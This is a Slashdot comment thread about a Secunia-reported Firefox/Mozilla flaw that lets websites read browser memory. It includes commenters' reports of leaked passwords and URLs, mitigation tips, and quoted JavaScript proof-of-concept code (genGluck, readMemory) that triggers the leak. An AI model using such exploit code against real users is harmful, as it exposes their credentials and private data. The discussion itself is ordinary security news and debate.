Mozilla / Firefox Memory Exposure Vulnerability
JimmyM writes "Secunia has a story regarding a new severe vulnerability in the Mozilla Suite and Firefox browser, which can be exploited by any web site to read all memory, which the browser process has access to. No patch is available from Mozilla. A demonstration is available here."
Did the Mozilla/Firefox guys ignore a warning about this, or did this site publish the vulnerability without giving them a chance to patch?
This is a *huge* hole. In three clicks, it disclosed previous URLs that I had visited, POSTDATA (including my Slashdot password) and a bunch of other stuff.
If this could be automated (and it easily could be with something like XML-RPC), imagine the possibilities for phishing. Visit a page, have your credit card number disclosed.
Time for Firefox 1.03.
It works if you don't click quickly and repeatedly in Firefox.
It's almost scary... the JavaScript for this looks to just abuse a buffer overflow in an almost scary-easy way.
function genGluck(str){
var x = str;
var rx=/end/i;
x = x.replace(rx,function($1){
$1.match(rx);
return "";
});
x = x.replace(/^end/,"");
return x;
}
function readMemory()
{
var mem = genGluck("{10,246 "X's" here}end");
mem = mem.replace(/[^\.\\\:\/\'\(\)\"\_\?\=\%\&\;\#\@\- a-zA-Z0-9]+/g, " ");
document.getElementById('result').value = mem;
}
A community-oriented lyrics site
Which is fair enough.
Of course, I can reinstall the OS in about two hours.
It's my documents I actually care about...
My Journal
In addition to a bunch of Xs, Safari threw a little piece of Javascript code not originating on the source page into the end of the text box. Looks light it might be a little vulnerable too.
This data is available to the javascript engine then, so it is possible for the javascript to submit it a number of ways to an internet server. It could call a web service with the data or post it to a web page. The server could then organize this data and examine it for anything interesting.
This will not allow someone to read your personal files or hijack your computer. The real problem would be if stored passwords or sensitive data from web mail or banking sites were on the heap and were found this way and transmitted to a web site. A large amount of 'Junk' would have to be sifted through in order to get any juicy data though.
The only way to be save right now is (in FireFox) to go to Tools->Options, go to "Web Features", and uncheck "Enable Javascript". Seeing as many sites (including /.) require javascript to use, this really isn't a good option. I hope the team gets a fixed version out soon.
Version numbers don't mean anything. They're arbitrary, and you cannot compare them to the numbers of other products like you appear to be doing, at least not in any meaningful way.
I don't normally complain about the grammar and punctuation of submitters and editors, but in this case it is too significant. The difference between
and
Is profound. The first form says that the browser has access to all memory. The second form says that the web site has access to all the memory to which the browser also has access. Catching and fixing stuff like this is what an editor does. If Slashdot's people can't do that, then don't call them editors. Call them "Dudes Who Click Approve," or something like that.
No, it would be "New Critical IE Vulnerability" and it would be on the front page...
In Soviet America the banks rob you!
K-Meleon has the same problem, only it probably won't be patched for months, forcing me back to Firefox. Bah.